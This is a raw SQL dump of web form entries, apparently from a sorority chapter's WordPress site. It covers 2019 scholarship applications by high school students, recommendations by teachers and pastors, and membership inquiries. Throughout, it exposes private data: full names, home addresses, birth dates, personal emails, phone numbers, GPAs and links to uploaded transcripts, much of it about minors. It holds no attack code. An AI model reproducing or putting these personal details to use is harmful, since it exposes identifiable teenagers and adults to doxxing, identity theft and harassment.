Advisor'),(3871,330,6,28,'N/A'),(3872,330,6,9,'3.38'),(3873,330,6,26,'Business Administration'),(3874,330,6,12,'15'),(3875,330,6,14,'-  Softball (general member)  (2016) \r\n-  Softball manager (2018-2019)\r\n-  Student Leadership Cadre (general member) 2017-2019\r\n-  Student Government Association (student representative) 2017-2019\r\n-  Black Student Union (general member) 2016-2019\r\n-  Bully Free Forever (general member) 2018-2019\r\n-  Delta Scholars (historian) 2016-2019\r\n-  Track & Field (Thrower) 2015-2017\r\n-  Marching Band (Drumline) 2015-2019\r\n- JROTC Unarmed Drill Team (general cadet) 2015-2016\r\n- JROTC (Platoon sergeant) 2015-2019\r\n- Basketball (ELEV8, Church League) (point guard) 2012-2018'),(3876,330,6,13,'- Gold Honor Roll 2015-2018\r\n- Principal\'s Honor Roll 2019\r\n- Perfect Attendance 2007-2018\r\n- Student of The Month 2015-2017\r\n- National Honor Society 2018\r\n- National Society of High School Scholars 2018\r\n- 3rd Place for best Photographs in art show 2018\r\n- Best Squad at New Cadet Camp 2018\r\n- Black Student Achievement Program Certificate of Excellence 2019'),(3877,330,6,36,'- Merriweather Post Pavilion, Carnevil 2017 \r\n- Eagle Scout Project 2017 \r\n- Toys4Tots 2015-2018 \r\n- JROTC,  AHS Graduation Detail (2015-2018)\r\n- Marching band, Howard Community College College Fair (2016)\r\n- JROTC, Panera Fundraiser Support (2016)\r\n- JROTC, Back to School Night Detail (2016)\r\n- JROTC, School Summer Help (2016)\r\n- Becca\'s Closet, Sorting (12/8/18)\r\n- St. John\'s Baptist Church, Basket wrapping (12/15/18)\r\n- Pom\'s, Concessions (2/2/19)\r\n- JROTC, Military ball clean up (2/2/19)\r\n- Band, Mattress sale advertisement (2/9/19)\r\n- JROTC, Bake sale (3/4/19)\r\n-  Becca\'s Closet, Sorting (3/16/19)\r\n- Wilde Lake, Soup kitchen (3/17/19)\r\n- Becca\'s Closet, Sorting (3/29/19)\r\n- PTSA Game Night (3/29/19)'),(3878,330,6,37,'Hampton University \r\nTowson University \r\nMorgan State University'),(3879,330,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/ruth-conway-essay.docx'),(3880,330,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/transcripts.pdf'),(3881,330,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/release.pdf'),(3882,331,6,18.3,'Justine'),(3883,331,6,18.6,'Wabo'),(3884,331,6,19.1,'6118 Majors Lane'),(3885,331,6,19.3,'Columbia'),(3886,331,6,19.4,'MD'),(3887,331,6,19.5,'21045'),(3888,331,6,19.6,'United States'),(3889,331,6,4,'05-07-2001'),(3890,331,6,21,'andreawabo15@gmail.com'),(3891,331,6,20,'(202) 770-9196'),(3892,331,6,10,'Oakland Mills High School'),(3893,331,6,27,'BSAP Advisor'),(3894,331,6,28,'N/A'),(3895,331,6,9,'4.0'),(3896,331,6,26,'Business Law and Accounting'),(3897,331,6,12,'NA'),(3898,331,6,14,'Homebase coaching (2018-present); Active member'),(3899,331,6,13,'NA'),(3900,331,6,36,'After school E.S.O.L tutoring (2017-2018); E.S.O.L.\r\nAfter school-Campus cleaning (2017-2018); E.S.O.L.'),(3901,331,6,37,'Georgetown University\r\nGeorge Washington University'),(3902,331,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Unofficial-transcript.pdf'),(3903,331,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Photo-permission.pdf'),(3904,331,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Scholarship-Essay.pdf'),(3905,332,8,1.3,'Linda'),(3906,332,8,1.6,'Ables'),(3907,332,8,11,'River Bend Middle School'),(3908,332,8,12,'Paretn Liaision'),(3909,332,8,2,'lables2001@aol.com'),(3910,332,8,3,'Caleb Callender'),(3911,332,8,4,'His whole life'),(3912,332,8,5,'Other'),(3913,332,8,7,'Excellent'),(3914,332,8,9,'Excellent'),(3915,332,8,8,'Excellent'),(3916,332,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/03/Conway-recommendation-Linda.docx'),(3917,332,8,16,'Highly recommended'),(3918,333,6,18.3,'Caleb'),(3919,333,6,18.6,'Callender'),(3920,333,6,19.1,'10113 Summer Glow Walk'),(3921,333,6,19.3,'Laurel'),(3922,333,6,19.4,'MD'),(3923,333,6,19.5,'20723'),(3924,333,6,19.6,'United States'),(3925,333,6,4,'061401'),(3926,333,6,21,'calebcallender01@outlook.com'),(3927,333,6,20,'(301) 919-0387'),(3928,333,6,10,'Atholton High School'),(3929,333,6,27,'School Counselor/Advisor'),(3930,333,6,28,'NA'),(3931,333,6,9,'3.3'),(3932,333,6,26,'Statistics'),(3933,333,6,12,'3'),(3934,333,6,14,'Alpha Acheivers 2016-19 (Treasurer)\r\nBlack Student Union'),(3935,333,6,13,'National Honor Society 2018\r\nStudent of the Month'),(3936,333,6,36,'The people’s community Baptist church ushers ministry 2015-2019\r\n\r\nYouth works mission trip June 21-26, 2015 Harrisburg Pennsylvania\r\n\r\nLaurel Woods Middle School student mentor, helping children with homework Fall 2016\r\n\r\nGrass roots crisis intervention center feed homeless/prepare food\r\n\r\nSalvation Army angel tree program volunteered at Baltimore site Dec 3 2016. Dec 8, 2018'),(3937,333,6,37,'Penn State \r\nVirginia Tech \r\nTowson University\r\nLSU'),(3938,333,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Conway-essay.pdf'),(3939,333,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Unofficial-Transcript-Caleb-Callender.pdf'),(3940,333,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Conway-release.pdf'),(3941,334,6,18.3,'Gloria'),(3942,334,6,18.6,'Ogordi'),(3943,334,6,19.1,'9370 Canterbury Riding'),(3944,334,6,19.3,'Laurel'),(3945,334,6,19.4,'MARYLAND'),(3946,334,6,19.5,'20723'),(3947,334,6,19.6,'United States'),(3948,334,6,4,'06-14-01'),(3949,334,6,21,'ogordig@yahoo.com'),(3950,334,6,20,'(301) 646-1426'),(3951,334,6,10,'Atholton High School'),(3952,334,6,27,'BSAP Advisor'),(3953,334,6,28,'NA'),(3954,334,6,9,'3.7'),(3955,334,6,26,'Neuroscience'),(3956,334,6,12,'NA'),(3957,334,6,14,'Student Government Association (SGA) - 4 years - Vice President\r\nStudent Leadership Cadre (SLC) - 3 years- President \r\nDelta Scholars - 3 years - President\r\nBlack Student Union- 4 years - Secretary \r\nNational Honor Society - 3 years- Chair of Volunteer Activities \r\nJunior Leadership and Academic Bowl (JLAB) team- 4 years - Captin\r\nChurch Youth Group - Vice President\r\nFrench National Honor Society - 2 years\r\nScience National Honor Society - 2 years\r\nBest Buddies- Associate Buddy- 4 years\r\nPre- Med Club - 2 years'),(3958,334,6,13,'Cadet most improved  [2017]\r\nNon- Commissioned Officer Award [2017]\r\nAmerican Legion Scholastic Excellence Award [2018]\r\nNationals Award for cadet challenge [2018]\r\nSHF- French National Honor Society award [2017]\r\nDelta Scholars Induction award [2016]\r\nNational Honors Society award [2018]\r\nScience National Honor Society award  [2018]\r\nCouncil of Elders MSA award [2016]\r\nBest Company JA Rising Women Award [2016]'),(3959,334,6,36,'JROTC/ Savage Fair Volunteer/ June 2017\r\nYouth Group/ Vacation Bible School Volunteer / July 2017-18 \r\nSt. Mary of the Mills Parish / Cantor / Sunday\'s (2016-PRESENT)\r\nBreast Cancer Club/ made bracelets and designed t-shirts to sell / October 2018\r\nBreast Cancer Club/ Raised $500 for cancer research at Walter Reed National Military Medical Center / Oct. 2018\r\nYouth Group / Sing during Christmas and holidays for senior citizens/ December 2016-17-18\r\nYouth Group/ Passed out Pamphlets and gave directions for gates at two Ravens games/ All games held at  the Ravens Stadium\r\nYouth Group/ Sold mulch to raise money for Haiti twinning project at church/ November 2017-18\r\nSt. Mary of the Mills / Served as a teen aid for Sunday School/ Sept.2018 - May 2018\r\nGirls on the Run/ Hand out t-shirts and medals to runners at Girls on the run 5k/ Dec. 2018\r\nJROTC / Gave directions and cheered on runners during Police Pace race/  September 2016-17\r\nSGA/ Volunteer for the 5k for Pancreatic Cancer/ October 2017\r\nDelta Scholars/ Hosted Delta Scholars Pasta Dinner at school / March 2017-18\r\nSLC / Hosted Multicultural night / March 14 2017-18\r\nSGA/ Decorated halls for homecoming/  October 2016-17-18\r\nSGA / Planned 2018 prom at M&T bank stadium/ May 2018\r\nSLC/ Planned and decorated Veterans Day celebration/ November 11th 2017-18\r\nSGA/ Help hand out diplomas to graduating seniors/ May 2018\r\nSGA/ Collected school supplies for students that attend John B. Kennedy Elementary school/ Jan. 2017\r\nSLC/ Raised money for Tier 1 school Texas that was affected by Hurricane Harvey/ November 2017\r\nBSU/ Participated and hosted in BSU assembly / February 2016-17-19\r\nScience Olympiad/ Held bake sale for Science Olympiad funds for competition/ March 2017\r\nSGA/ Held a bake sale with SGA and raised money for nonprofit organization through HOBY/ April 2018\r\n Science Olympiad /Competed in Science Olympiad competition at UMD and John Hopkins/ Jan. 2017\r\nJLAB/ Participated in JLAB finals competition at Catholic University/ 2016\r\nBest Buddies/ Held spread the word to end the word / Sept. 2018-19\r\nBest Buddies/ Raised thousands of dollars for the best buddies foundation/ Aug.- March 2017-18\r\nBest Buddies Participated in the best buddy walk/ March 2017-18\r\nJROTC/ Help direct traffic and guide runners for Clemens Crossing 5k run/ April 2017\r\nSGA/ Participated and helped run Raiderfest / 2017\r\nSGA/ Help set up and direct Homecoming pep rally/  Oct. 2017-19\r\nJROTC Marched with JROTC during homecoming parade Oct. 2016-19\r\nSGA/ Planned senior breakfast / May 2018\r\nSt. Mary of the Mills Parish/ Make and sell food at the Christmas Bazaar/ November 2017-18\r\nJROTC/ Rake leaves for Columbia residents / November 2017-18\r\nBest Buddies/ Paint and decorate bowls for empty bowls fundraiser/ March 2017-18\r\nJROTC/ Back to school night parent guide/ October 2016-19\r\nSLC / give new students tips about high school and time management/ 2017-19\r\nJROTC/ giving a tour to incoming freshmen/ 2017-18\r\nSLC/ Giving advice and getting to know incoming freshmen/ 2017-19\r\nJROTC/ Preparing first day of school folders for students / Aug. 2017-19\r\nJROTC / Setting up teachers classrooms/ Aug. 2017-19\r\nJROTC/ Collect items and create care packages for homeless/ February 2017-18 March 2019\r\nJROTC/ Hand out blessing bags/ 2017-18\r\nJROTC/ visit middle schools in order to recruit for Jrotc/ Jan. 2017-19\r\nBreast Cancer Club/ Sell scarfs and knitted items during lunch/ October 2019 \r\nJROTC/ plan Senior Senior citizen  prom/  November 2017-18\r\nJROTC/ can food drive /  Sept. 2017-18\r\nJROTC / Car wash / April 2018\r\nJROTC/ organize uniforms / August 2017-18\r\nJROTC/ bake sale fundraiser/ March 2019\r\nJROTC/ Guide for the teacher district meeting/ September 2017\r\nYouth Group/ Flamingo Flocking Fundraiser/ October 2017-19\r\nSt.  Mary of the Mills Parish / Altar server/ Sundays 2015-PRESENT \r\nSt.  Mary of the Mills Parish / Church 175 celebration set up/ March 2017 \r\nSGA/ Trunk or Treat for elementary school students/ Oct. 2017-18 \r\nSt.  Mary of the Mills Parish / Sell coffee and Hand out donuts  ( Community Sunday) / Nov. 2018\r\nSt.  Mary of the Mills Parish / Sell Christmas cards to raise funds for the parish preservation fund / Dec. 2017-18\r\nJROTC/ New Cadet - serve a squad leader to cadets / August 5th-8th 2018\r\nJROTC/ ran concessions during drill competition / Jan 2017-19\r\nYouth Group/ Soup kitchen / December 2018\r\nYouth Group/ Overnight stay with homeless shelter / Dec.2017-18\r\nSt.  Mary of the Mills Parish / Station of the Cross (live)/ April 2016-19\r\nUNICEF/ Collecting loose change / October 2016-19\r\nSGA/ End of the year bake sale / March 2018\r\nSister to Sister/ Coat Drive/ January 2019\r\nBecca\'s Closet/ Storing and organizing dresses/ Nov. 20, 2019\r\nDelta Scholars/ Delta Scholar Book Drive/ March 4th-March 20th 2019\r\nFrench NHS/ tutoring/ March 19 2019 \r\nScience NHS/ fixing garden/ yard work at Robinson Center/ March 26th, 2019'),(3960,334,6,37,'Spelman College\r\nGeorgetown University \r\nUniversity of Pittsburgh \r\nUniversity of Maryland Baltimore'),(3961,334,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/new-doc-2019-03-29-18.42.47_20190329184301.pdf'),(3962,334,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/new-doc-2019-03-29-22.30.30.pdf'),(3963,334,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/W.-Ruth-Conway-Essay-2.pdf'),(3964,335,6,18.3,'Javier'),(3965,335,6,18.6,'Ramirez Marquez'),(3966,335,6,19.1,'6817 Old Waterloo Rd'),(3967,335,6,19.2,'Apt 1012'),(3968,335,6,19.3,'Elkridge'),(3969,335,6,19.4,'MD'),(3970,335,6,19.5,'21075'),(3971,335,6,19.6,'United States'),(3972,335,6,4,'04/22/01'),(3973,335,6,21,'ramirjavi@gmail.com'),(3974,335,6,20,'(443) 537-7640'),(3975,335,6,10,'Long Reach High School'),(3976,335,6,27,'School Counselor/Advisor'),(3977,335,6,28,'N/A'),(3978,335,6,9,'3.14'),(3979,335,6,26,'Mechanical Engineering'),(3980,335,6,12,'NA'),(3981,335,6,14,'Class Council of 2019 (2016-2019 member)\r\nAlpha Achievers (2017-2019 member)\r\nNational Honors Society (2019 member)\r\nLatino Lightning (2015-2017 member, 2018-2019 Executive Board)\r\nPink Ribbon(2018-2019 member)'),(3982,335,6,13,'N/A'),(3983,335,6,36,'Boy Scouts of America (2012-2018)\r\nAlpha Achievers(2017-2019)\r\nNational Honors Society (2019)'),(3984,335,6,37,'University of Maryland Baltimore County\r\nTemple University\r\nDrexel University\r\nHoward Community College'),(3985,335,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Ruth-scholarship.docx'),(3986,335,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Transcript.pdf'),(3987,335,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Release-form.pdf'),(3988,336,6,18.3,'Chelsea'),(3989,336,6,18.6,'Amihere'),(3990,336,6,19.1,'8791 Mary Ln'),(3991,336,6,19.3,'Jessup'),(3992,336,6,19.4,'MD'),(3993,336,6,19.5,'20794'),(3994,336,6,19.6,'United States'),(3995,336,6,4,'02/08/01'),(3996,336,6,21,'camihe1402@gmail.com'),(3997,336,6,20,'(240) 360-7132'),(3998,336,6,10,'Hammond High School'),(3999,336,6,27,'Other'),(4000,336,6,28,'Naviance'),(4001,336,6,9,'2.88'),(4002,336,6,26,'Computer Science'),(4003,336,6,12,'NA'),(4004,336,6,14,'resume attached'),(4005,336,6,13,'resume attached'),(4006,336,6,36,'resume attached'),(4007,336,6,37,'Howard\r\nSpelman\r\nTowson'),(4008,336,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Scanned-Documents.pdf'),(4009,336,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Scanned-Documents-21.pdf'),(4010,336,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/03/Zeta-Phi-Beta-Scholarship-Essay-1.pdf'),(4011,337,8,1.3,'Katherine'),(4012,337,8,1.6,'Leforge'),(4013,337,8,11,'Atholton high school'),(4014,337,8,12,'Science teacher'),(4015,337,8,2,'Katherine_leforge@hcpss.org'),(4016,337,8,3,'Danielle Floyd'),(4017,337,8,4,'1 school  year as a student in my class,1 year as a general student at atholton'),(4018,337,8,5,'Teacher/Professor'),(4019,337,8,7,'Average'),(4020,337,8,9,'Average'),(4021,337,8,8,'N/A'),(4022,337,8,14,'Danielle strives to be her best. She is very involved at school with track and JROTC. She did well in my class, despite being out a lot for the afformentioned activities.'),(4023,337,8,16,'Recommended'),(4024,338,8,1.3,'Renato'),(4025,338,8,1.6,'Gonzales'),(4026,338,8,11,'Oakland Mills High School'),(4027,338,8,12,'ESOL Teacher/ Track Coach'),(4028,338,8,2,'renato_gonzales@hcpss.org'),(4029,338,8,3,'Oluwaseun Sule'),(4030,338,8,4,'4 Years'),(4031,338,8,5,'Other'),(4032,338,8,6,'Track Coach'),(4033,338,8,7,'Excellent'),(4034,338,8,9,'Excellent'),(4035,338,8,8,'Excellent'),(4036,338,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/04/Seun-Sule-recommendation-1.docx'),(4037,338,8,16,'Highly recommended'),(4038,339,8,1.3,'Bryan'),(4039,339,8,1.6,'Ringgold'),(4040,339,8,11,'Oakland Mills High School'),(4041,339,8,12,'Black Student Achievement Liaison (BSAP)'),(4042,339,8,2,'Bryan_Ringgold@hcpss.org'),(4043,339,8,3,'Oluwaseun Tabitha Sule'),(4044,339,8,4,'2 years'),(4045,339,8,5,'Other'),(4046,339,8,6,'Mentor / Coach'),(4047,339,8,7,'Excellent'),(4048,339,8,9,'Excellent'),(4049,339,8,8,'Excellent'),(4050,339,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/04/Seun-LOR.pdf'),(4051,339,8,16,'Highly recommended'),(4052,340,8,1.3,'Bryan'),(4053,340,8,1.6,'Ringgold'),(4054,340,8,11,'Oakland Mills High School'),(4055,340,8,12,'Black Student Achievement Liaison (BSAP)'),(4056,340,8,2,'Bryan_Ringgold@hcpss.org'),(4057,340,8,3,'Merina Kayla Seldon'),(4058,340,8,4,'2 years'),(4059,340,8,5,'Other'),(4060,340,8,6,'Mentor / Coach'),(4061,340,8,7,'Excellent'),(4062,340,8,9,'Excellent'),(4063,340,8,8,'Excellent'),(4064,340,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/04/Merina-LOR.pdf'),(4065,340,8,16,'Highly recommended'),(4066,341,8,1.3,'Matthew'),(4067,341,8,1.6,'Quainoo'),(4068,341,8,11,'Celebration Church of Columbia'),(4069,341,8,12,'Deputy Pastor of Student Ministries'),(4070,341,8,2,'mquainoo@wininlife.com'),(4071,341,8,3,'Javon Daniel'),(4072,341,8,4,'3 years'),(4073,341,8,5,'Other'),(4074,341,8,6,'Deputy Pastor of Student Ministries'),(4075,341,8,7,'Excellent'),(4076,341,8,9,'Excellent'),(4077,341,8,8,'Excellent'),(4078,341,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/04/Javon-Daniel-Letter-of-Recommendation-Quainoo.docx'),(4079,341,8,16,'Highly recommended'),(4080,342,8,1.3,'Kathryn'),(4081,342,8,1.6,'Impeduglia'),(4082,342,8,11,'Atholton High'),(4083,342,8,12,'Teacher'),(4084,342,8,2,'Kathryn_Impeduglia@hcpss.org'),(4085,342,8,3,'Javon Daniel'),(4086,342,8,4,'2 years'),(4087,342,8,5,'Teacher/Professor'),(4088,342,8,7,'Excellent'),(4089,342,8,9,'Excellent'),(4090,342,8,8,'Excellent'),(4091,342,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/04/Javon-Daniel-LETTER-of-REC.pdf'),(4092,342,8,16,'Highly recommended'),(4093,343,8,1.3,'Laurese'),(4094,343,8,1.6,'Gerald'),(4095,343,8,11,'Ebenezer Baptist Church'),(4096,343,8,12,'Youth Director'),(4097,343,8,2,'Lmgerald10@gmail.com'),(4098,343,8,3,'Albert D. Jackson'),(4099,343,8,4,'7 years'),(4100,343,8,5,'Other'),(4101,343,8,6,'Youth Director at Church'),(4102,343,8,7,'Excellent'),(4103,343,8,9,'Excellent'),(4104,343,8,8,'Excellent'),(4105,343,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/04/Albert-Jackson-Letter-of-Recommendation.docx'),(4106,343,8,16,'Highly recommended'),(4107,344,10,1.3,'Vanita'),(4108,344,10,1.6,'Darden-Hess'),(4109,344,10,3,'vanitahess@gmail.com'),(4110,344,10,5,'(443) 858-9651'),(4111,344,10,2,'Interested in Membership'),(4112,345,10,1.3,'Wynoka'),(4113,345,10,1.6,'Munlyn'),(4114,345,10,3,'w_munlyn@live.com'),(4115,345,10,5,'(757) 589-8449'),(4116,345,10,2,'Interested in Membership'),(4117,345,10,4,'Currently interested in finding out more information about how I can  help improve our communities with a group of like-minded women like those of Zeta Phi Beta Sorority, Inc. I am a Navy Veteran with a BS in Cybersecurity Management. Any information or guidance you can provide will be greatly appreciated. \r\n\r\nThank you.'),(4118,346,7,1.3,'Juliana'),(4119,346,7,1.6,'Buadu'),(4120,346,7,2,'jrbuadu@gmail.com'),(4121,346,7,3,'Pearlette Club'),(4122,346,7,4,'I will like information on getting my daughter, Jahaziah Buadu Wilson apart of the Pearlette Club.'),(4123,347,10,1.3,'Juliana'),(4124,347,10,1.6,'Buadu'),(4125,347,10,3,'jrbuadu@gmail.com'),(4126,347,10,5,'(240) 863-7853'),(4127,347,10,2,'Interested in Membership'),(4128,347,10,4,'My name is Juliana Buadu, I am a current online Criminal Justice student at Colorado Technical University. I am interested in becoming a member of the Zeta Phi Beta Sorority. My expected graduation date is August 2021. My current GPA is 3.75 and I have 55 credits towards my Bachelor of Science Degree. I never had the opportunity to attend my college of choice due to my poor life choices as a young adult. It is never too late to accomplish my dream goals, so with this second chance, I plan to take full advantage. \r\n\r\nI have always wanted to join a Sorority. My cousin introduced Zeta Phi Beta when she joined while attending Howard Univerity. During my research, I have found out that you can still join a Sorority as a college graduate. I would love to be apart of a lifetime sisterhood with Zeta Phi Beta after graduation or even now if possible. What I did not find during my research was if I would be eligible to join the sisterhood as an online college student/graduate. \r\n\r\nI would like more information on how to join the chapter as an online student or graduate. I can be reached via email at Jrbuadu@gmail.com or on my cellphone at 240-863-7853. I look forward to hearing from someone soon.'),(4129,348,10,1.3,'Shanee'),(4130,348,10,1.6,'Satchell'),(4131,348,10,3,'shanee.satchell@gmail.com'),(4132,348,10,5,'(301) 655-5756'),(4133,348,10,2,'Inactive Member (Reclaim)'),(4134,348,10,4,'Hi Soror,\r\n\r\nI\'m interested in coming back for 2019-2020. How much are dues going to be for this sorority year?\r\n\r\n<3,\r\nShanee'),(4135,349,10,1.3,'Adriana'),(4136,349,10,1.6,'Rich'),(4137,349,10,3,'adrianaprich@rocketmail.com'),(4138,349,10,5,'(240) 704-0030'),(4139,349,10,2,'Interested in Membership'),(4140,349,10,4,'Good evening,\r\nMy name is Adriana Rich and I looking forward to gain more information regarding your organization. My mother and sister are members of Zeta Phi Beta Inc.  I can be contacted via email or'),(4141,350,10,1.3,'Adriana'),(4142,350,10,1.6,'Rich'),(4143,350,10,3,'adrianaprich@gmail.com'),(4144,350,10,5,'(240) 704-0030'),(4145,350,10,2,'Interested in Membership'),(4146,350,10,4,'Good evening,\r\nFirst I want to apologize for sending two messages but my hand slipped and clicked submit before I finished my message. Again my name is Adriana. I am interesting in receiving more information regarding your organization. My mother and sister are both Zetas and I have seen how this sorority (sisterhood) has impacted their lives in such a positive way. I looked forward to more information. \r\n\r\nThanks in advance,\r\nAdriana Rich'),(4147,351,10,1.3,'Adriana'),(4148,351,10,1.6,'Rich'),(4149,351,10,3,'adrianaprich@gmail.com'),(4150,351,10,5,'(240) 704-0030'),(4151,351,10,2,'Interested in Membership'),(4152,351,10,4,'Good evening,\r\nFirst I want to apologize for sending two messages but my hand slipped and clicked submit before I finished my message. Again my name is Adriana. I am interesting in receiving more information regarding your organization. My mother and sister are both Zetas and I have seen how this sorority (sisterhood) has impacted their lives in such a positive way. I looked forward to more information. \r\n\r\nThanks in advance,\r\nAdriana Rich'),(4153,352,10,1.3,'Tamara'),(4154,352,10,1.6,'Swinson'),(4155,352,10,3,'tamara.swinson@gmail.com'),(4156,352,10,5,'(240) 478-8736'),(4157,352,10,2,'Current Active Member (Transfer)'),(4158,352,10,4,'Looking for a new Zeta home and would love to visit at the next chapter meeting.'),(4159,353,10,1.3,'Karen'),(4160,353,10,1.6,'Walther'),(4161,353,10,3,'mskn.walton@gmail.com'),(4162,353,10,5,'(301) 980-6630'),(4163,353,10,2,'Interested in Membership'),(4164,353,10,4,'I am interested in learning more about your organization and the membership intake process.'),(4165,354,10,1.3,'Marionese'),(4166,354,10,1.6,'Forderingham'),(4167,354,10,3,'memebx@gmail.com'),(4168,354,10,5,'(917) 549-3299'),(4169,354,10,2,'Interested in Membership'),(4170,354,10,4,'Good Day,\r\n\r\nI am interested in membership of Zeta Phi Beta Sorority, Inc. and would like more information about this chapter and the community.\r\n\r\nThank you in advance'),(4171,355,10,1.3,'Kimberly'),(4172,355,10,1.6,'Street'),(4173,355,10,3,'Kastreet@hotmail.com'),(4174,355,10,5,'(240) 393-2576'),(4175,355,10,2,'Interested in Membership'),(4176,355,10,4,'Hello. I am very interested in becoming a member of Zeta Phi Beta. I am a Howard University graduate, class of 1996.  My daughter is currently a Pearlette.  I would love to learn more information regarding membership. Thank you so much!'),(4177,356,10,1.3,'Angela'),(4178,356,10,1.6,'Norman'),(4179,356,10,3,'cbzaybelt@gmail.com'),(4180,356,10,5,'(240) 380-5487'),(4181,356,10,2,'Current Active Member (Transfer)'),(4182,356,10,4,'Greetings Soror,\r\n\r\nI was unable to locate a contact e-mail address, so please excuse this information being presented in the membership forum.\r\n\r\nMy name is Soror Angela Y. Norman. I am a member of Zeta Phi Beta Sorority Inc., with the Graduate Chapter, Chi Beta Zeta. I am also currently a member of the National Pan-Hellenic Council (NPHC), Inc. of Metropolitan Baltimore.\r\n\r\nIn an effort to gain support and attendance, I have been tasked to reach out to all of the Graduate Chapters of Zeta Phi Beta Sorority, Inc., in order to provide important information about an upcoming event. \r\n\r\nThe event is the\" 2020 REGIONAL BLANKET EVENT.\" also known as the Baltimore Blanket Event in the years prior. Last year the event was very successful, and our partners are very excited to participate in the 2020 Regional Blanket Event. This event will be Big, and we want you to be part of it.\r\n\r\nI am not familiar with the name of the Lambda Gamma Zeta Chapter President, as I would like to communicate with her to ensure the NPHC has the Lambda Gamma Zeta Chapter support. \r\n\r\nTime is of the essence, and the sooner we get started the more successful this event will be in 2020. \r\n\r\nPlease forward my contact (e-mail address cbzaybelt@gmail.com) information to the Lambda Gamma Zeta Chapter President for additional information.  I look forward to hearing from the Chapter President soon.\r\n\r\nSisterly,\r\nSoror Norman'),(4183,357,10,1.3,'Dominique'),(4184,357,10,1.6,'Zackery'),(4185,357,10,3,'dominique.zackery@gmail.com'),(4186,357,10,5,'(202) 531-8818'),(4187,357,10,2,'Interested in Membership'),(4188,357,10,4,'My name is Dominique Zackery and I am reaching out to express interest for Membership into Lambda Gamma Zeta chapter of Zeta Phi Beta Sorority.  One of the main reasons why I would like to become a part of such a great organization such as Zeta Phi Beta is because of Lady such as Felicia Rogers and friends from College who have expressed to me how much the organization does in the community as well as uplift each other in all aspects of their personal life. For those reasons if given the opportunity I would hope that I would be able to contribute and the continued Legacy of the organization. I hope to be given the opportunity to share more about myself and be of service to the organization.'),(4189,358,10,1.3,'Dina'),(4190,358,10,1.6,'Kuniken'),(4191,358,10,3,'dinakuniken@yahoo.com'),(4192,358,10,5,'(443) 531-2768'),(4193,358,10,2,'Interested in Membership'),(4194,359,10,1.3,'Stephanie'),(4195,359,10,1.6,'Harvin'),(4196,359,10,3,'swharvin@verizon.net'),(4197,359,10,5,'(404) 704-2787'),(4198,359,10,2,'Interested in Membership'),(4199,359,10,4,'Hello My name is Stephanie Harvin and I am interested in becoming a member of the Zeta Grad chapter.  My undergrad was at Payne College where I was a Sigma Sweetheart. I did not pledge Zeta during that time but wish I had. My MBA was at Webster University. Please consider me in joining the Zeta family. Thank you\r\n\r\nStephanie Harvin'),(4200,360,10,1.3,'Akiyia'),(4201,360,10,1.6,'Baines'),(4202,360,10,3,'AkiyiaBaines@hotmail.com'),(4203,360,10,5,'(910) 373-1977'),(4204,360,10,2,'Interested in Membership'),(4205,361,10,1.3,'Brandi'),(4206,361,10,1.6,'Tyson'),(4207,361,10,3,'branditysn@gmail.com'),(4208,361,10,5,'(202) 733-0557'),(4209,361,10,2,'Interested in Membership'),(4210,361,10,4,'Good Afternoon, \r\n\r\nI\'m very interested in learning more about the membership intake process.'),(4211,362,10,1.3,'Tonecia'),(4212,362,10,1.6,'Griffin'),(4213,362,10,3,'tonisgriffin@verizon.net'),(4214,362,10,5,'(410) 868-9523'),(4215,362,10,2,'Interested in Membership'),(4216,362,10,4,'Thank you in advance for contacting me.'),(4217,363,10,1.3,'Lanaya'),(4218,363,10,1.6,'Jones'),(4219,363,10,3,'joneslan06@gmail.com'),(4220,363,10,5,'(910) 591-9248'),(4221,363,10,2,'Interested in Membership'),(4222,363,10,4,'I am a graduate student at the University of Maryland, Baltimore (resident of Howard county), and I’m interested in joining the graduate chapter. Could you send me more information such as required meetings to attend to be 